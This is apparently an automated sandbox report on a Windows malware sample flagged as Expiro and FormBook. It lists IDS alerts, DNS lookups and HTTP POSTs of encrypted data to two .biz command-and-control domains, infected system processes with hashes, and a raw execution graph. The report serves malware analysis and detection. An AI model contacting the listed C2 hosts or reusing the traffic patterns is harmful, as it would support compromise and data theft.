
                    Language of compilation systemCountry where language is spokenMap
                    EnglishGreat Britain

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2025-01-10T23:40:54.311918+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.84970454.244.188.17780TCP
                    2025-01-10T23:40:54.447678+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.849704TCP
                    2025-01-10T23:40:54.447678+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.849704TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 10, 2025 23:40:53.605201960 CET4970480192.168.2.854.244.188.177
                    Jan 10, 2025 23:40:53.610069036 CET804970454.244.188.177192.168.2.8
                    Jan 10, 2025 23:40:53.610153913 CET4970480192.168.2.854.244.188.177
                    Jan 10, 2025 23:40:53.610929012 CET4970480192.168.2.854.244.188.177
                    Jan 10, 2025 23:40:53.610950947 CET4970480192.168.2.854.244.188.177
                    Jan 10, 2025 23:40:53.615739107 CET804970454.244.188.177192.168.2.8
                    Jan 10, 2025 23:40:53.615782976 CET804970454.244.188.177192.168.2.8
                    Jan 10, 2025 23:40:54.311741114 CET804970454.244.188.177192.168.2.8
                    Jan 10, 2025 23:40:54.311844110 CET804970454.244.188.177192.168.2.8
                    Jan 10, 2025 23:40:54.311918020 CET4970480192.168.2.854.244.188.177
                    Jan 10, 2025 23:40:54.442912102 CET4970480192.168.2.854.244.188.177
                    Jan 10, 2025 23:40:54.447678089 CET804970454.244.188.177192.168.2.8
                    Jan 10, 2025 23:40:54.493932962 CET4970580192.168.2.818.141.10.107
                    Jan 10, 2025 23:40:54.498838902 CET804970518.141.10.107192.168.2.8
                    Jan 10, 2025 23:40:54.499140978 CET4970580192.168.2.818.141.10.107
                    Jan 10, 2025 23:40:54.612068892 CET4970580192.168.2.818.141.10.107
                    Jan 10, 2025 23:40:54.612068892 CET4970580192.168.2.818.141.10.107
                    Jan 10, 2025 23:40:54.616995096 CET804970518.141.10.107192.168.2.8
                    Jan 10, 2025 23:40:54.617012978 CET804970518.141.10.107192.168.2.8
                    Jan 10, 2025 23:40:55.033266068 CET4970580192.168.2.818.141.10.107

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 10, 2025 23:40:53.549143076 CET5189053192.168.2.81.1.1.1
                    Jan 10, 2025 23:40:53.556240082 CET53518901.1.1.1192.168.2.8
                    Jan 10, 2025 23:40:54.454590082 CET5253053192.168.2.81.1.1.1
                    Jan 10, 2025 23:40:54.464338064 CET53525301.1.1.1192.168.2.8

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jan 10, 2025 23:40:53.549143076 CET192.168.2.81.1.1.10xe06bStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                    Jan 10, 2025 23:40:54.454590082 CET192.168.2.81.1.1.10x9763Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jan 10, 2025 23:40:53.556240082 CET1.1.1.1192.168.2.80xe06bNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                    Jan 10, 2025 23:40:54.464338064 CET1.1.1.1192.168.2.80x9763No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • pywolwnvd.biz
                    • ssbzmoy.biz

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.84970454.244.188.177804452C:\Users\user\Desktop\LiuUGJK9vH.exe
                    TimestampBytes transferredDirectionData
                    Jan 10, 2025 23:40:53.610929012 CET349OUTPOST /hdjf HTTP/1.1
                    Cache-Control: no-cache
                    Connection: Keep-Alive
                    Pragma: no-cache
                    Host: pywolwnvd.biz
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                    Content-Length: 802
                    Jan 10, 2025 23:40:53.610950947 CET802OUTData Raw: 08 c1 b9 99 0d 24 7a d8 16 03 00 00 df f2 4d fc d3 a2 a1 05 fc 01 78 b3 bb 50 d2 04 20 2a 3b b6 f5 f7 37 a3 2d 60 27 49 d3 44 09 57 c2 07 e5 39 86 ad 13 78 f1 8a ba e7 98 60 3e 79 3b 69 01 c1 29 ea 3f dd 9a 19 77 06 ee cb e6 37 38 73 f4 8f 83 08
                    Data Ascii: $zMxP *;7-`'IDW9x`>y;i)?w78s*vi&V(=S0b`zN]Wu.74PqJNMi63@+9'%q{`3f"=jtL05 g;)=rX[ks0E`~x
                    Jan 10, 2025 23:40:54.311741114 CET413INHTTP/1.1 200 OK
                    Server: nginx
                    Date: Fri, 10 Jan 2025 22:40:54 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Set-Cookie: btst=33d1484f22f0d711475b852d9d00310b|8.46.123.189|1736548854|1736548854|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.84970518.141.10.107804452C:\Users\user\Desktop\LiuUGJK9vH.exe
                    TimestampBytes transferredDirectionData
                    Jan 10, 2025 23:40:54.612068892 CET346OUTPOST /rai HTTP/1.1
                    Cache-Control: no-cache
                    Connection: Keep-Alive
                    Pragma: no-cache
                    Host: ssbzmoy.biz
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                    Content-Length: 802
                    Jan 10, 2025 23:40:54.612068892 CET802OUTData Raw: 9a 05 ed 2b 44 6c cc 99 16 03 00 00 35 3e 9b 19 32 3f 7d 7e ea 92 2f 70 99 66 6f 1e d1 37 ee ce 4f b2 71 95 8d 8e a9 5a e1 d3 2f c5 6b a4 24 d9 71 e9 1b 02 d8 fc 7e fa 1a 3e 6c c2 57 b8 9a 63 04 be 05 09 e9 5f df 47 e5 29 4f bd fd 3b 6f 86 a7 08
                    Data Ascii: +Dl5>2?}~/pfo7OqZ/k$q~>lWc_G)O;oW8*]^(]Wc$6u_D%*Ju1X_l8*LvE?nsT'IMGC>O{ML\{Ns<`I`IcR)dacxJWXDT1H


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:17:40:51
                    Start date:10/01/2025
                    Path:C:\Users\user\Desktop\LiuUGJK9vH.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\LiuUGJK9vH.exe"
                    Imagebase:0x400000
                    File size:1'761'792 bytes
                    MD5 hash:690A2CBB7F785F6F90A0B510F31D40DE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:17:40:51
                    Start date:10/01/2025
                    Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                    Imagebase:0x400000
                    File size:1'658'880 bytes
                    MD5 hash:1E28FD404AAE9396AA5D6A1141873E0E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:false

                    General

                    Target ID:3
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\System32\alg.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\alg.exe
                    Imagebase:0x140000000
                    File size:1'594'368 bytes
                    MD5 hash:01FCE6399A1AC48F9D7931507B2534BB
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:false

                    General

                    Target ID:4
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\SysWOW64\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\LiuUGJK9vH.exe"
                    Imagebase:0x6e0000
                    File size:46'504 bytes
                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:5
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\System32\drivers\AppVStrm.sys
                    Wow64 process (32bit):
                    Commandline:
                    Imagebase:
                    File size:138'056 bytes
                    MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                    Has elevated privileges:
                    Has administrator privileges:
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    General

                    Target ID:6
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\System32\drivers\AppvVemgr.sys
                    Wow64 process (32bit):
                    Commandline:
                    Imagebase:
                    File size:174'408 bytes
                    MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                    Has elevated privileges:
                    Has administrator privileges:
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    General

                    Target ID:7
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\System32\drivers\AppvVfs.sys
                    Wow64 process (32bit):
                    Commandline:
                    Imagebase:
                    File size:154'952 bytes
                    MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                    Has elevated privileges:
                    Has administrator privileges:
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    General

                    Target ID:8
                    Start time:17:40:52
                    Start date:10/01/2025
                    Path:C:\Windows\System32\AppVClient.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\AppVClient.exe
                    Imagebase:0x140000000
                    File size:1'348'608 bytes
                    MD5 hash:04218364223ED3D355D0195140331BD0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:3.9%
                      Dynamic/Decrypted Code Coverage:6.8%
                      Signature Coverage:9%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:55
                      execution_graph 108570 441de4 GetTempPathW 108571 441e01 108570->108571 108572 ba4398 108586 ba1fe8 108572->108586 108574 ba4452 108589 ba4288 108574->108589 108592 ba5478 GetPEB 108586->108592 108588 ba2673 108588->108574 108590 ba4291 Sleep 108589->108590 108591 ba429f 108590->108591 108593 ba54a2 108592->108593 108593->108588 108594 43fe27 108607 41f944 108594->108607 108596 43fe3d 108597 43fe53 108596->108597 108600 43febe 108596->108600 108696 409e5d 60 API calls 108597->108696 108599 43fe92 108601 44089c 108599->108601 108602 43fe9a 108599->108602 108616 40fce0 108600->108616 108698 469e4a 89 API calls 4 library calls 108601->108698 108697 46834f 59 API calls Mailbox 108602->108697 108606 43feb2 Mailbox 108608 41f950 108607->108608 108609 41f962 108607->108609 108699 409d3c 60 API calls Mailbox 108608->108699 108611 41f991 108609->108611 108612 41f968 108609->108612 108710 409d3c 60 API calls Mailbox 108611->108710 108700 420db6 108612->108700 108615 41f95a 108615->108596 108739 408180 108616->108739 108618 40fd3d 108619 44472d 108618->108619 108679 4106f6 108618->108679 108744 40f234 108618->108744 108862 469e4a 89 API calls 4 library calls 108619->108862 108623 44488d 108632 40fe4c 108623->108632 108658 444742 108623->108658 108868 47a2d9 85 API calls Mailbox 108623->108868 108624 40fe3e 108624->108623 108624->108632 108866 4566ec 59 API calls 2 library calls 108624->108866 108625 410517 108636 420db6 Mailbox 59 API calls 108625->108636 108626 444b53 108626->108658 108887 469e4a 89 API calls 4 library calls 108626->108887 108627 444755 108631 4447d7 108627->108631 108863 40f6a3 341 API calls 108627->108863 108629 420db6 59 API calls Mailbox 108641 40fdd3 108629->108641 108631->108658 108864 469e4a 89 API calls 4 library calls 108631->108864 108632->108626 108637 4448f9 108632->108637 108748 40837c 108632->108748 108633 444848 108867 4560ef 59 API calls 2 library calls 108633->108867 108644 410545 _memmove 108636->108644 108645 444917 108637->108645 108870 4085c0 59 API calls Mailbox 108637->108870 108641->108624 108641->108625 108641->108627 108641->108629 108641->108644 108641->108658 108670 44480c 108641->108670 108836 409ea0 108641->108836 108642 4448b2 Mailbox 108642->108632 108869 4566ec 59 API calls 2 library calls 108642->108869 108651 420db6 Mailbox 59 API calls 108644->108651 108648 444928 108645->108648 108871 4085c0 59 API calls Mailbox 108645->108871 108646 40fea4 108654 444ad6 108646->108654 108655 40ff32 108646->108655 108688 410179 Mailbox _memmove 108646->108688 108647 44486b 108649 409ea0 341 API calls 108647->108649 108648->108688 108872 4560ab 59 API calls Mailbox 108648->108872 108649->108623 108694 410106 _memmove 108651->108694 108881 469ae7 60 API calls 108654->108881 108656 420db6 Mailbox 59 API calls 108655->108656 108661 40ff39 108656->108661 108661->108679 108755 4109d0 108661->108755 108662 444a4d 108663 409ea0 341 API calls 108662->108663 108664 444a87 108663->108664 108664->108658 108876 4084c0 108664->108876 108667 40ffb2 108667->108644 108674 40ffe6 108667->108674 108667->108679 108865 469e4a 89 API calls 4 library calls 108670->108865 108672 444ab2 108880 469e4a 89 API calls 4 library calls 108672->108880 108680 410007 108674->108680 108882 408047 108674->108882 108861 469e4a 89 API calls 4 library calls 108679->108861 108680->108679 108683 444b24 108680->108683 108685 41004c 108680->108685 108681 410398 108681->108606 108682 420db6 59 API calls Mailbox 108682->108688 108886 409d3c 60 API calls Mailbox 108683->108886 108685->108626 108685->108679 108686 4100d8 108685->108686 108832 409d3c 60 API calls Mailbox 108686->108832 108688->108662 108688->108672 108688->108679 108688->108681 108688->108682 108689 444a1c 108688->108689 108834 408740 68 API calls __cinit 108688->108834 108835 408660 68 API calls 108688->108835 108873 465937 68 API calls 108688->108873 108874 4089b3 69 API calls Mailbox 108688->108874 108875 409d3c 60 API calls Mailbox 108688->108875 108692 420db6 Mailbox 59 API calls 108689->108692 108690 4100eb 108690->108679 108833 4082df 59 API calls Mailbox 108690->108833 108692->108662 108694->108688 108695 410162 108694->108695 108860 409c90 59 API calls Mailbox 108694->108860 108695->108606 108696->108599 108697->108606 108698->108606 108699->108615 108703 420dbe 108700->108703 108702 420dd8 108702->108615 108703->108702 108705 420ddc std::exception::exception 108703->108705 108711 42571c 108703->108711 108728 4233a1 DecodePointer 108703->108728 108729 42859b RaiseException 108705->108729 108707 420e06 108730 4284d1 58 API calls _free 108707->108730 108709 420e18 108709->108615 108710->108615 108712 425797 108711->108712 108720 425728 108711->108720 108737 4233a1 DecodePointer 108712->108737 108714 42579d 108738 428b28 58 API calls __getptd_noexit 108714->108738 108717 42575b RtlAllocateHeap 108717->108720 108727 42578f 108717->108727 108719 425783 108735 428b28 58 API calls __getptd_noexit 108719->108735 108720->108717 108720->108719 108724 425781 108720->108724 108725 425733 108720->108725 108734 4233a1 DecodePointer 108720->108734 108736 428b28 58 API calls __getptd_noexit 108724->108736 108725->108720 108731 42a16b 58 API calls 2 library calls 108725->108731 108732 42a1c8 58 API calls 8 library calls 108725->108732 108733 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108725->108733 108727->108703 108728->108703 108729->108707 108730->108709 108731->108725 108732->108725 108734->108720 108735->108724 108736->108727 108737->108714 108738->108727 108740 40818f 108739->108740 108743 4081aa 108739->108743 108888 407e4f 108740->108888 108742 408197 CharUpperBuffW 108742->108743 108743->108618 108745 40f251 108744->108745 108746 40f272 108745->108746 108892 469e4a 89 API calls 4 library calls 108745->108892 108746->108641 108749 40838d 108748->108749 108750 43edbd 108748->108750 108751 420db6 Mailbox 59 API calls 108749->108751 108752 408394 108751->108752 108753 4083b5 108752->108753 108893 408634 59 API calls Mailbox 108752->108893 108753->108637 108753->108646 108756 444cc3 108755->108756 108770 4109f5 108755->108770 108956 469e4a 89 API calls 4 library calls 108756->108956 108758 410cfa 108758->108667 108761 410ee4 108761->108758 108763 410ef1 108761->108763 108762 410a4b PeekMessageW 108831 410a05 Mailbox 108762->108831 108954 411093 341 API calls Mailbox 108763->108954 108765 410ef8 LockWindowUpdate DestroyWindow GetMessageW 108765->108758 108768 410f2a 108765->108768 108767 444e81 Sleep 108767->108831 108771 445c58 TranslateMessage DispatchMessageW GetMessageW 108768->108771 108769 410ce4 108769->108758 108953 411070 10 API calls Mailbox 108769->108953 108770->108831 108957 409e5d 60 API calls 108770->108957 108958 456349 341 API calls 108770->108958 108771->108771 108773 445c88 108771->108773 108773->108758 108774 444d50 TranslateAcceleratorW 108775 410e43 PeekMessageW 108774->108775 108774->108831 108775->108831 108776 410ea5 TranslateMessage DispatchMessageW 108776->108775 108777 410d13 timeGetTime 108777->108831 108778 44581f WaitForSingleObject 108780 44583c GetExitCodeProcess CloseHandle 108778->108780 108778->108831 108814 410f95 108780->108814 108781 410e5f Sleep 108816 410e70 Mailbox 108781->108816 108782 408047 59 API calls 108782->108831 108784 420db6 59 API calls Mailbox 108784->108831 108785 445af8 Sleep 108785->108816 108788 42049f timeGetTime 108788->108816 108789 410f4e timeGetTime 108955 409e5d 60 API calls 108789->108955 108792 445b8f GetExitCodeProcess 108797 445ba5 WaitForSingleObject 108792->108797 108798 445bbb CloseHandle 108792->108798 108795 485f25 110 API calls 108795->108816 108796 40b7dd 109 API calls 108796->108816 108797->108798 108797->108831 108798->108816 108800 409e5d 60 API calls 108800->108831 108801 445874 108801->108814 108802 445c17 Sleep 108802->108831 108803 445078 Sleep 108803->108831 108810 409ea0 314 API calls 108810->108831 108811 40fce0 314 API calls 108811->108831 108814->108667 108816->108788 108816->108792 108816->108795 108816->108796 108816->108801 108816->108802 108816->108803 108816->108814 108816->108831 108983 407667 108816->108983 108988 462408 60 API calls 108816->108988 108989 409e5d 60 API calls 108816->108989 108990 407de1 108816->108990 108994 4089b3 69 API calls Mailbox 108816->108994 108995 40b73c 341 API calls 108816->108995 108996 4564da 60 API calls 108816->108996 108997 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108816->108997 108998 463c55 66 API calls Mailbox 108816->108998 108818 469e4a 89 API calls 108818->108831 108819 409c90 59 API calls Mailbox 108819->108831 108820 4084c0 69 API calls 108820->108831 108821 40b73c 314 API calls 108821->108831 108823 45617e 59 API calls Mailbox 108823->108831 108824 4089b3 69 API calls 108824->108831 108825 4455d5 VariantClear 108825->108831 108826 408cd4 59 API calls Mailbox 108826->108831 108827 456e8f 59 API calls 108827->108831 108828 44566b VariantClear 108828->108831 108829 445419 VariantClear 108829->108831 108830 407de1 59 API calls 108830->108831 108831->108762 108831->108767 108831->108769 108831->108774 108831->108775 108831->108776 108831->108777 108831->108778 108831->108781 108831->108782 108831->108784 108831->108785 108831->108789 108831->108800 108831->108810 108831->108811 108831->108814 108831->108816 108831->108818 108831->108819 108831->108820 108831->108821 108831->108823 108831->108824 108831->108825 108831->108826 108831->108827 108831->108828 108831->108829 108831->108830 108894 40e420 108831->108894 108901 40e6a0 108831->108901 108932 40f460 108831->108932 108952 4031ce IsDialogMessageW GetClassLongW 108831->108952 108959 486018 59 API calls 108831->108959 108960 469a15 59 API calls Mailbox 108831->108960 108961 45d4f2 59 API calls 108831->108961 108962 409837 108831->108962 108980 4560ef 59 API calls 2 library calls 108831->108980 108981 408401 59 API calls 108831->108981 108982 4082df 59 API calls Mailbox 108831->108982 108832->108690 108833->108694 108834->108688 108835->108688 108837 409ebf 108836->108837 108848 409eed Mailbox 108836->108848 108838 420db6 Mailbox 59 API calls 108837->108838 108838->108848 108839 40b47a 108842 4409e5 108839->108842 108843 440055 108839->108843 108840 40b475 108841 408047 59 API calls 108840->108841 108851 40a057 108841->108851 110401 469e4a 89 API calls 4 library calls 108842->110401 110398 469e4a 89 API calls 4 library calls 108843->110398 108844 407667 59 API calls 108844->108848 108847 420db6 59 API calls Mailbox 108847->108848 108848->108839 108848->108840 108848->108843 108848->108844 108848->108847 108848->108851 108853 408047 59 API calls 108848->108853 108855 422d40 67 API calls __cinit 108848->108855 108856 456e8f 59 API calls 108848->108856 108857 4409d6 108848->108857 108859 40a55a 108848->108859 110396 40c8c0 341 API calls 2 library calls 108848->110396 110397 40b900 60 API calls Mailbox 108848->110397 108850 440064 108850->108641 108851->108641 108853->108848 108855->108848 108856->108848 110400 469e4a 89 API calls 4 library calls 108857->110400 110399 469e4a 89 API calls 4 library calls 108859->110399 108860->108694 108861->108619 108862->108658 108863->108631 108864->108658 108865->108658 108866->108633 108867->108647 108868->108642 108869->108642 108870->108645 108871->108648 108872->108688 108873->108688 108874->108688 108875->108688 108877 4084cb 108876->108877 108879 4084f2 108877->108879 110402 4089b3 69 API calls Mailbox 108877->110402 108879->108672 108880->108658 108881->108674 108883 408052 108882->108883 108884 40805a 108882->108884 108885 407f77 59 API calls 108883->108885 108884->108680 108885->108884 108886->108626 108887->108658 108889 407e62 108888->108889 108891 407e5f _memmove 108888->108891 108890 420db6 Mailbox 59 API calls 108889->108890 108890->108891 108891->108742 108892->108746 108893->108753 108895 40e451 108894->108895 108896 40e43d 108894->108896 109000 469e4a 89 API calls 4 library calls 108895->109000 108999 40df00 341 API calls 2 library calls 108896->108999 108898 40e448 108898->108831 108900 443aa4 108900->108900 108902 40e6d5 108901->108902 108903 443aa9 108902->108903 108905 40e73f 108902->108905 108908 40e799 108902->108908 108904 409ea0 341 API calls 108903->108904 108906 443abe 108904->108906 108905->108908 108910 407667 59 API calls 108905->108910 108931 40e970 Mailbox 108906->108931 109005 469e4a 89 API calls 4 library calls 108906->109005 108907 407667 59 API calls 108907->108908 108908->108907 108911 422d40 __cinit 67 API calls 108908->108911 108913 443b26 108908->108913 108916 40e95a 108908->108916 108908->108931 108912 443b04 108910->108912 108911->108908 109006 422d40 108912->109006 108913->108831 108915 4084c0 69 API calls 108915->108931 108916->108931 109009 469e4a 89 API calls 4 library calls 108916->109009 108918 409ea0 341 API calls 108918->108931 108920 469e4a 89 API calls 108920->108931 108925 408d40 59 API calls 108925->108931 108928 40f195 109013 469e4a 89 API calls 4 library calls 108928->109013 108929 443e25 108929->108831 108930 40ea78 108930->108831 108931->108915 108931->108918 108931->108920 108931->108925 108931->108928 108931->108930 109001 407f77 108931->109001 109010 456e8f 59 API calls 108931->109010 109011 47c5c3 341 API calls 108931->109011 109012 47b53c 341 API calls Mailbox 108931->109012 109014 409c90 59 API calls Mailbox 108931->109014 109015 4793c6 341 API calls Mailbox 108931->109015 108933 40f650 108932->108933 108934 40f4ba 108932->108934 108935 407de1 59 API calls 108933->108935 108936 40f4c6 108934->108936 108937 44441e 108934->108937 108943 40f58c Mailbox 108935->108943 109094 40f290 108936->109094 109211 47bc6b 108937->109211 108940 44442c 108944 40f630 108940->108944 109251 469e4a 89 API calls 4 library calls 108940->109251 108942 40f4fd 108942->108940 108942->108943 108942->108944 109109 47df37 108943->109109 109112 463c37 108943->109112 109115 404e4a 108943->109115 109121 46cb7a 108943->109121 109201 47445a 108943->109201 108944->108831 108946 40f5e3 108946->108944 109210 409c90 59 API calls Mailbox 108946->109210 108952->108831 108953->108761 108954->108765 108955->108831 108956->108770 108957->108770 108958->108770 108959->108831 108960->108831 108961->108831 108963 409851 108962->108963 108972 40984b 108962->108972 108964 409857 __itow 108963->108964 108965 43f4da 108963->108965 108966 409899 108963->108966 108967 43f5d3 __i64tow 108963->108967 108970 420db6 Mailbox 59 API calls 108964->108970 108973 420db6 Mailbox 59 API calls 108965->108973 108978 43f552 Mailbox _wcscpy 108965->108978 110394 423698 83 API calls 3 library calls 108966->110394 108967->108967 108971 409871 108970->108971 108971->108972 108974 407de1 59 API calls 108971->108974 108972->108831 108975 43f51f 108973->108975 108974->108972 108976 420db6 Mailbox 59 API calls 108975->108976 108977 43f545 108976->108977 108977->108978 108979 407de1 59 API calls 108977->108979 110395 423698 83 API calls 3 library calls 108978->110395 108979->108978 108980->108831 108981->108831 108982->108831 108984 420db6 Mailbox 59 API calls 108983->108984 108985 407688 108984->108985 108986 420db6 Mailbox 59 API calls 108985->108986 108987 407696 108986->108987 108987->108816 108988->108816 108989->108816 108991 407df0 __wsetenvp _memmove 108990->108991 108992 420db6 Mailbox 59 API calls 108991->108992 108993 407e2e 108992->108993 108993->108816 108994->108816 108995->108816 108996->108816 108997->108816 108998->108816 108999->108898 109000->108900 109002 407f87 109001->109002 109004 407f9a _memmove 109001->109004 109003 420db6 Mailbox 59 API calls 109002->109003 109002->109004 109003->109004 109004->108931 109005->108931 109016 422c44 109006->109016 109008 422d4b 109008->108908 109009->108931 109010->108931 109011->108931 109012->108931 109013->108929 109014->108931 109015->108931 109017 422c50 __wfsopen 109016->109017 109024 423217 109017->109024 109023 422c77 __wfsopen 109023->109008 109041 429c0b 109024->109041 109026 422c59 109027 422c88 DecodePointer DecodePointer 109026->109027 109028 422c65 109027->109028 109029 422cb5 109027->109029 109038 422c82 109028->109038 109029->109028 109087 4287a4 59 API calls __wfsopen 109029->109087 109031 422d18 EncodePointer EncodePointer 109031->109028 109032 422cec 109032->109028 109036 422d06 EncodePointer 109032->109036 109089 428864 61 API calls 2 library calls 109032->109089 109033 422cc7 109033->109031 109033->109032 109088 428864 61 API calls 2 library calls 109033->109088 109036->109031 109037 422d00 109037->109028 109037->109036 109090 423220 109038->109090 109042 429c2f EnterCriticalSection 109041->109042 109043 429c1c 109041->109043 109042->109026 109048 429c93 109043->109048 109045 429c22 109045->109042 109072 4230b5 58 API calls 3 library calls 109045->109072 109049 429c9f __wfsopen 109048->109049 109050 429cc0 109049->109050 109051 429ca8 109049->109051 109060 429ce1 __wfsopen 109050->109060 109076 42881d 58 API calls 2 library calls 109050->109076 109073 42a16b 58 API calls 2 library calls 109051->109073 109053 429cad 109074 42a1c8 58 API calls 8 library calls 109053->109074 109056 429cd5 109058 429ceb 109056->109058 109059 429cdc 109056->109059 109057 429cb4 109075 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109057->109075 109063 429c0b __lock 58 API calls 109058->109063 109077 428b28 58 API calls __getptd_noexit 109059->109077 109060->109045 109065 429cf2 109063->109065 109066 429d17 109065->109066 109067 429cff 109065->109067 109079 422d55 109066->109079 109078 429e2b InitializeCriticalSectionAndSpinCount 109067->109078 109070 429d0b 109085 429d33 LeaveCriticalSection _doexit 109070->109085 109073->109053 109074->109057 109076->109056 109077->109060 109078->109070 109080 422d5e RtlFreeHeap 109079->109080 109084 422d87 _free 109079->109084 109081 422d73 109080->109081 109080->109084 109086 428b28 58 API calls __getptd_noexit 109081->109086 109083 422d79 GetLastError 109083->109084 109084->109070 109085->109060 109086->109083 109087->109033 109088->109032 109089->109037 109093 429d75 LeaveCriticalSection 109090->109093 109092 422c87 109092->109023 109093->109092 109095 40f43a 109094->109095 109097 40f2bc 109094->109097 109253 469e4a 89 API calls 4 library calls 109095->109253 109097->109095 109106 40f2f9 _memmove 109097->109106 109098 40f3d3 109099 40f3e3 109098->109099 109252 47a2d9 85 API calls Mailbox 109098->109252 109099->108942 109101 420db6 59 API calls Mailbox 109101->109106 109102 4443f9 109255 40f6a3 341 API calls 109102->109255 109104 409ea0 341 API calls 109104->109106 109105 4443a9 109105->108942 109106->109098 109106->109101 109106->109102 109106->109104 109106->109105 109107 4443ab 109106->109107 109254 469e4a 89 API calls 4 library calls 109107->109254 109256 47cadd 109109->109256 109111 47df47 109111->108946 109388 46445a GetFileAttributesW 109112->109388 109116 404e54 109115->109116 109117 404e5b 109115->109117 109392 4253a6 109116->109392 109119 404e6a 109117->109119 109120 404e7b FreeLibrary 109117->109120 109119->108946 109120->109119 109122 407667 59 API calls 109121->109122 109123 46cbaf 109122->109123 109124 407667 59 API calls 109123->109124 109125 46cbb8 109124->109125 109126 46cbcc 109125->109126 109858 409b3c 109125->109858 109128 409837 84 API calls 109126->109128 109129 46cbe9 109128->109129 109130 46ccea 109129->109130 109131 46cc0b 109129->109131 109143 46cd1a Mailbox 109129->109143 109662 404ddd 109130->109662 109132 409837 84 API calls 109131->109132 109134 46cc17 109132->109134 109136 408047 59 API calls 109134->109136 109139 46cc23 109136->109139 109137 46cd16 109137->109143 109145 46cc37 109139->109145 109146 46cc69 109139->109146 109143->108946 109149 408047 59 API calls 109145->109149 109147 409837 84 API calls 109146->109147 109150 46cc76 109147->109150 109152 46cc47 